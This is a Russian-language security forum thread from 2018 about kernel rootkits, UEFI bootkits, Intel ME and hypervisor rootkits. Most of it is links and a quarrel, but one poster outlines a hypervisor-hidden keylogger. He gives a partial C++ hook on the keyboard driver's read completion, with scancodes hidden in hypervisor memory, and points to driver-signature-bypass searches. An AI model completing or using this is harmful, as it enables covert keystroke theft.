Современные r0 rootkits, bootkits (bios, uefi), intel me\amt

Тема в разделе "WASM.HEAP", создана пользователем example, 14 фев 2018.

  1. example

    example Member

    Публикаций:
    0
    Регистрация:
    25 апр 2017
    Сообщения:
    5
    Привет, накидайте ссылок по теме - анализы, реверс, новости о сабже, какие технологие перспективные и акктуальные на сегодняшний день, покрывающие современные акктуальные ОС семейства Windows, что думаете о таких руткитах как necurs какие сильные и слабые стороны у него есть, много новостей о нем мелькает на тематических лентах, что можно сказать о гипервизор руткитах на intel процессорах... Что умерло как технология, а что будет еще долго жить... слабые и сильные места реализации, установка без цифровой подписи...

    Спасибо.
     
  2. TermoSINteZ

    TermoSINteZ Синоби даоса Команда форума

    Публикаций:
    2
    Регистрация:
    11 июн 2004
    Сообщения:
    3.552
    Адрес:
    Russia
    Из более менее свежего по Intel ME
    http://blog.ptsecurity.ru/2018/01/intel-me.html

    А так, вы очень много хотите чтоб за вас гуглили. По каждому запросу можно найти много инфы. Не поленитесь .
    ну например по necurs - первая ссылка в гугле

    http://sites.utexas.edu/iso/2016/03/10/reverse-engineering-necurs-part-2-unpacking/

    Вопрос про актуальное - ну щас вся шумиха во круг мельтдауна и спектр атаках. Вот про них и читайте

    А что умерло как технология. Тут вообще ерунда какая то - кто-то пользуется, кто-то нет. При чем тут умерло. Вон даже USB вирусы с автораном порой еще можно встретить, хотя казалось бы.

    Хотите конкретных ответов - задавайте конкретный вопрос.
     
  3. LastNoob

    LastNoob Member

    Публикаций:
    0
    Регистрация:
    28 янв 2018
    Сообщения:
    80
    Зайди на сайт вирусной аналитики, например на сайт Касперского и там ищи все, что тебя интересует - сводки, статистика, прочее.
     
  4. Fail

    Fail Active Member

    Публикаций:
    0
    Регистрация:
    14 мар 2012
    Сообщения:
    503
  5. TermoSINteZ

    TermoSINteZ Синоби даоса Команда форума

    Публикаций:
    2
    Регистрация:
    11 июн 2004
    Сообщения:
    3.552
    Адрес:
    Russia
    example,
    AMT никогда не будет широко распространенной.
    Даже исследователи из Интел (работающие там) - тестят свои ДЕВЕЛОПЕРСКИЕ борды, а то что идет в релиз - как правило с совсем другим биосом.

    Вот пример еще одного "взлома"

    https://twitter.com/h0t_max/status/928269320064450560

    конечно у каждого дома JTAG и плата с возможностью его подключить.
    В общем когда то давно оно было актуально из за распространенности 30ого чипсета (кривого) но потом все сошло на нет . И в конце концов - не Интелом едины будем.
     
  6. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    1. Некурс это не руткит, а убогая, трешевая малварь по технологичности сравнимая с вредоносами(именно вредоносами, потому что вреда от них больше чем пользы) режима ядра 200x годов.
    2. Руткиты на базе аппаратной виртуализации на данное время одни из лучших в плане универсальности и покрытия. Вполне сносно справляются с обходом KPP и прочих защит реализованных на уровне ядра. Имеют ряд недостатков связанных именно с тем уровнем на котором они работают. Несколько очевидных проблем: IOMMU, проблема с vmx тапками когда они уже оказываются занятыми другим HV, barel hv накладывающие доп. hardening против руткитов именно этого типа (ms плотно работает над решением этой задачи последние 2 года) и т.д.
    3. Установка без цифровой подписи это по сути DSE, тема заезжанная вдоль и поперек. как ее обходить/вырубать см. на github / google по тегам: DSE bypass.
    4. Сильные стороны руткитов заключаются в неизвестных доселе техниках и методах сокрытия. Слабые стороны же в том - что создать универсальный и качественный руткит - очень дорого и долго. Требуется качественный ресерч того уровня, на котором вы хотите реализовать сокрытие(хуки/подмена). Так ранее мной уже освещалась тема iratemonk'a от анб:
    https://wasm.in/threads/mozhno-li-zarabotat-na-bsod.32352/page-2#post-394595
    Нужно также понимать что стелс руткиты в реале оказывается мифом и не более того; любой руткит можно раскрыть имея физ. доступ к железке; руткит как решение от аверской автоматики - норм, но как решение для сокрытия malware активности от ручной экспертизы - совсем не очень. Профессионально разработанные руткиты - это плод работы нескольких десятков профессионалов в течении продолжительного времени. Как правило такие руткиты имеют достаточное спонсирование, но при этом выполняют минимальные требования по сокрытию / персистенции.
     
    Последнее редактирование модератором: 24 дек 2019
    superakira и yashechka нравится это.
  7. Fail

    Fail Active Member

    Публикаций:
    0
    Регистрация:
    14 мар 2012
    Сообщения:
    503
    Кому лень гуглить, смотрите ресурсы васма)
     
    RET нравится это.
  8. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    ну потому что антируткиты типа PCHunter юзают сырое чтение с диска, в обход сисколов и дровера фс; а тот рк что у вас на тестах был очевидно хендлить такое не умел. ваши сомнения возникли только из за того, что вы не понимаете насколько это мощная техника: спуфить можно любой код(и данные) что робят на уровне ОС(r3/r0). я вам выше уже перечислил реальные проблемы этих руткитов, другие "проблемы" вполне решаемы.

    superakira, гиперплатформа кстати годный фреймворк для организации хуков(код очень кошерный), однако он запилен в качестве poc, поэтому все фичи для андетекта дописываются уже вручную.
    В прошлом году писал универсальный механизм хуков на его базе(сплайсить можно практически все, включая неэкспортируемые функции r0/r3) плюс добавил спуфинги для счетчиков производительности(которые косвенно палят нестед виртуализацию) - получилась весьма хорошая реализация. Писать там еще есть много чего, но со временем туговато - без фин. мотивации проекты долго не живут.
     
    Последнее редактирование модератором: 24 дек 2019
    superakira нравится это.
  9. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    http://hypervsir.blogspot.com/
    http://igorkorkin.blogspot.com/
    http://standa-note.blogspot.com/

    помимо гиперплатформы стоящих проектов как бы и нет, если конечно не смотреть в сторону полноценных гипервизеров и тулкитов использующих их в качестве средства интроспекции и манипуляции ОС(drakvuf и т.п). можно также заморочиться с barel гипервизерами(под uefi), код достаточно легко добывается поиском на гитхабе (BitVisor, ramoflax, etc).
    я бы алсо посоветовал присмотреться к проектам на базе гиперплатформы(на том же гитхабе есть весьма интересные наработки: апи монитор, взаимоисключающий гипервизер, мемпрот и т.д). Успехов!
     
  10. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    Indy_, это чем барел гипервизер вам не зашел ? и что странного в UEFI ?
    не знаю как для вас, но для меня и нормальных людей - это возможность перехвата управления на ранних стадиях до загрузки ОС. не хотите/не можете перешить флешром, можете заморочиться с инфектом ESP. мне кажется момент с преимуществами барел вирты можно просто опустить; пишете внятно
    вот тут я вообще ничего не понял.
     
  11. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    Мне ваш пиар как до одного места честно говоря :) Напротив это вы как выскочка влезаете в каждый тред, даже там где не понимаете.. Зачем вы влезли туда, где вопрос был адресован лично мне ?

    Я задачи эти решал и решаются подобные задачи с полпинка, и знаете почему ? потому что основная работа что в uefi, что в гиперплатформе упрощена до невозможности. Кто писал/портировал код под uefi и hyperplatform потвердят мои слова. но там речь я вел вообще не об этом, но вам же не надо вчитываться/понимать о чем люди пишут - ваше дело выпрыгнуть из штанов и показать какой вы крутой/умный/интересный.
    бро инде прежде чем выпирать с такими заявлениями, попробуйте разобраться с собой. например с осознанием того что такое визор и что такое вообще секюрные анклавы. Secure Enclave мой юный друг в юзермоде существовать попросту не могут, ибо это противоречит здравой логике. вы сейчас начнете с пеной у рта доказывать обратное, это конечно же клиника. читали мы вашу матчасть; она есть ахинея с кучей с переопределенных/выдуманных терминов, которая конечно нам неврубным колхозникам недоступна для понимания. может отбросите выпендриваться и покажете нам крутых рк кодесов ? :lol:
     
  12. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    глупый вопрос, без тех. уточнений. но я отвечу:
    все детально просто, устанавливаем хук(trap) с гипервизера(hyperplatform) на один из обработчиков в шедове(win32k!InputApc) или лучше в фильтре клавиатуры(kdbfilter - kbdclass MJ_READ routines), для этого переопределяем:
    в UtilPcToFileHeader (https://github.com/tandasat/DdiMon/blob/master/DdiMon/ddi_mon.cpp#L174) адресс базового модуля который будем разбирать, далее разбираем EAT/non-EAT:
    https://github.com/tandasat/DdiMon/blob/master/DdiMon/ddi_mon.cpp#L180, мысленно опускаю атач со стеком драйверов обслуживающих ввод/вывод с клавиатуры), устанавливаем хук на OnReadCompletion(kbdinput) для этого:
    1) описываем NTSTATUS DdimonpHandleHandleOnReadCompletion(_In_ PDEVICE_OBJECT pDeviceObject, _In_ PIRP pIrp, _In_ PVOID Context)
    2) вносим в https://github.com/tandasat/DdiMon/blob/master/DdiMon/ddi_mon.cpp#L137 константу с именем экспортируемой/неэкспортируемой функции (DdimonpHandleHandleOnReadCompletion)
    3) создаем хендлер хука:
    Код (Text):
    1.  
    2. _Use_decl_annotations_ static NTSTATUS DdimonpHandleOnReadCompletion(IN PDEVICE_OBJECT pDeviceObject, IN PIRP pIrp, IN PVOID Context){
    3. const auto original =
    4.       DdimonpFindOrignal(DdimonpHandleHandleOnReadCompletion);
    5.   const auto result = original(pDeviceObject, pIrp, Context);
    6.   if (!NT_SUCCESS(result)) {
    7.     return result;
    8.   }
    9. else {
    10.  //реализуем перехват
    11. if(pIrp->IoStatus.Status == STATUS_SUCCESS)
    12. {
    13. PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)pIrp->AssociatedIrp.SystemBuffer;
    14. int numKeys = pIrp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);
    15. for(int i = 0; i < numKeys; i++)
    16. {
    17. ///....извлекаем сканкоды в потоке
    18.  
    19. }
    20. }
    21. return result;
    22. }
    23.  
    хуки с EPT прозрачны и невидимы из любого мода ОС, скан коды будут копиться в памяти hv(если вы ее конечно зарезервировали) и также недоступны для чтения из ядра.

    //upd: небольшое уточнение, если вы все же хотите чтобы вызовы с гипервизера были полностью "прозрачными" необходимо реализовать полноценную эмуляцию тех функций с которыми вы будете работать.
     
    Последнее редактирование: 28 фев 2018
  13. Indy_

    Indy_ Well-Known Member

    Публикаций:
    4
    Регистрация:
    29 апр 2011
    Сообщения:
    4.775
    Leon.Marselle,

    > Secure Enclave мой юный друг в юзермоде существовать попросту не могут, ибо это противоречит здравой логике. вы сейчас начнете с пеной у рта доказывать обратное, это конечно же клиника. читали мы вашу матчасть; она есть ахинея с кучей с переопределенных/выдуманных терминов, которая конечно нам неврубным колхозникам недоступна для понимания.

    Так судя по всему и есть, раз вы это не можите понять. Изоляция привилегий это всегда основа защиты. Если всё ап не исполняемо, то что вы будите выполнять ?
    (далее поскипано админом, во избежание перехода на личности)
     
    Последнее редактирование модератором: 2 мар 2018
  14. Indy_

    Indy_ Well-Known Member

    Публикаций:
    4
    Регистрация:
    29 апр 2011
    Сообщения:
    4.775
    > (далее поскипано админом, во избежание перехода на личности)

    Почему то админа не волнует избежание судьбы прошлого форума. Думаю это не так и не он это отредактировал. Я же сацуру считаю не адекватным и не могу по этой причине ничего технически обсуждать. И есчо не понимаю как вы можите поддерживать вредителя.

    Ну конечно, если бы не его взлом, то данного ресурса небыло бы(причина-следствие), как же я не подумал, какой же я идиот".. :sarcastic:
     
  15. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    задавайте более корректный вопрос, чтобы получить корректный ответ. у меня в голове после чтения вашего предложения сразу несколько ответов образовалось. ок, давайте попробую ответить обобщенно.
    CPL реализованное на уровне железа имеет достаточно веское основание, чтобы быть недосягаемым из софта(по крайней мере в идеале так и должно быть). в реале конечно все печальнее, если железо не защищено от side channel атак оно оказывается уязвимым для различного рода атак. Meltdown, Spectre-1/2/n как один из ярких примеров реального времени.
    окей, а что у нас с софтом ? точнее с тем что вы реализовали под маской секюрных анклавов(которые кстати никакие не анклавы и тем более не секюрные). проблема в том, что псевдоанклав на базе грязных хаков с памятью(и сомнительным хендлингом) далек от реального аппаратного анклава коим представляется например SGX или SEP(secure enclave processor). я уже имел практику писать "анклав" на базе аппаратной виртуализации и знаю что говорю. решение которое основывается на аппаратной виртуализации(shadowing PDT/PDE в EPT с перехватами nt сисколов и DKOM) как бы не анклав вообще(хотя предусматривает работу с CPL/DPL<0), ваше же решение на этом фоне смешно даже обсуждать. Для меня на данный момент SE - это решение которое представляется защищенным не только от программной атаки. так например аппаратные анклавы используемые iOS устройствами и интеловские камни совместимые с SGX уязвимы только в плане IC/logical design(side channel атаки).
    вот вы говорите "ап не исполняемо, то что вы будите выполнять", с гипервизера(hv, начиная с nested) или с более привилегированного режима имея более высокий IRQL, я могу исполнить незаметно и очень быстро(для ОС) любой код в том ап который для вас является неисполняемым. шах и мат ? кажется да, досвидания :)
     
  16. Indy_

    Indy_ Well-Known Member

    Публикаций:
    4
    Регистрация:
    29 апр 2011
    Сообщения:
    4.775
    example,

    Во первых обсуждайте, почему вы не обсуждаете ?
    Во вторых этот человек адекватно обсуждать не может, вы это не знаете и не понимаете, я же это знаю и осознаю, зная данного человека, слишком долго длились такие обсуждения. Походу вы зелёный, но эти обсуждения помнят многие, термос например несомненно.
    А в третьих мне не нужны его запросы, которые появляются у мня в логе, а есчо это единственный человек к которому я испытываю неприязнь, не только за прошлые действия, но за саму модель мышления, ход мыслей.
     
  17. Indy_

    Indy_ Well-Known Member

    Публикаций:
    4
    Регистрация:
    29 апр 2011
    Сообщения:
    4.775
    example,

    Хорошо. Только помните что поток инфы от него на 98% состоит из заумных терминов и далёкой от реала теории, так как в этом и состоит смысл его обсуждения. А есчо я офигел от вашей рекомендации с 14 постами :sarcastic_hand:
     
  18. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    example, его проблема в том что он никого не хочет слышать кроме себя. мне кажется его проще игнорить(что я и собираюсь сделать после этого сообщения), в том числе и подрастающему поколению.
    вы читали его труды ? небольшое сравнение: читать спеки от intel достаточно сложное и нудное занятие(хотя весьма и полезное), читать инде намногое сложнее и нуднее - и это вовсе не потому что это черезвычайно умно/сокращенно, проблема в человеке который выдумывает терминологию и переопределяет сущности других терминов(секюрные анклавы как яркий пример). пример: вы понимающий технарь и хотите изучить его труд, по мере чтения у вас возникнет желание посмотреть что он подразумевает под тем или иным неизвестным вам доселе термином. вы идете в гугл вбиваете этот термин и получаете что ? термин соответствующий своему реальному значению, который идет в разрез с тем что описывает этот человек в своей документации.
    а теперь внимание вопрос: вы больше доверяете авторитетным источникам информации или вбросу этого вечно непонятого/обиженного "интеллектуала" ? вопрос конечно риторический, но вы можете ответить
     
  19. TermoSINteZ

    TermoSINteZ Синоби даоса Команда форума

    Публикаций:
    2
    Регистрация:
    11 июн 2004
    Сообщения:
    3.552
    Адрес:
    Russia
    Кончаем обсуждать тут сатцуру. Либо по теме пишем, обсуждаем, критикуем линки, меряемся знаниями - либо рид-онли на неделю.
    Leon.Marselle, если вам не понятно, что пишет Инди - я вам совет уже давал в личке, что делать. Воспользуйтесь им
     
  20. Leon.Marselle

    Leon.Marselle New Member

    Публикаций:
    0
    Регистрация:
    5 дек 2017
    Сообщения:
    15
    TermoSINteZ, спасибо не обязательно, я вообще тут на досуге зашел увидел интересную тему решил ответить, вроде человеку помогло и это уже хорошо. можно забанить акк(без проблем) - я и так ухожу в офф. Леитраот!